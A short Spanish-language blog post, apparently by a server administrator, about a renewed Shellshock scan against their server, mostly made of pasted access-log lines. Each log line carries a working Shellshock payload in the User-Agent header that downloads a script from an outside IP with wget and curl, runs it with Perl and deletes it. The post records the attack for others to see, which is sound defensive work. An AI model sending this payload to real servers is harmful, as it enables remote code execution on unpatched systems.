Vuelta al shellshock

Hacia unos meses que no teníamos un ataque Shellshock. Hace unos días volvieron a intentar explotarlo, esta vez desde ips rusas usando una maquina intermedia que estaba en Estados Unidos. Se ve que aburrian mucho con este verano tórrido que están teniendo. Mas vodka y menos tocar las narices.

78.25.80.226 – – [03/Sep/2015:15:50:16 +0200] «GET /cgi-bin/php4 HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:07 +0200] «GET /cgi-bin/defaultwebpage.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:05 +0200] «GET /cgi-bin/contact.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:05 +0200] «GET /cgi-bin/test HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:05 +0200] «GET /cgi-bin/uptime.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:05 +0200] «GET /cgi-bin/status.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:05 +0200] «GET /cgi-bin/welcome.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:04 +0200] «GET /cgi-bin/upload.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:03 +0200] «GET /cgi-bin/test.sh HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:02 +0200] «GET /cgi-bin/supply.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:01 +0200] «GET /cgi-bin/Count.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»
78.25.80.226 – – [03/Sep/2015:15:50:00 +0200] «GET /cgi-bin/formmail.cgi HTTP/1.1» 404 323 «-» «() { :;};/usr/bin/perl -e ‘print \»Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\»;system(\»wget http://69.64.75.185/k/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://69.64.75.185/k/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*\»);'»

Y así durante al menos 4 horas mas … Supongo que todavía habrá muchas maquinas sin parchear, porque de esto ya hace tiempo …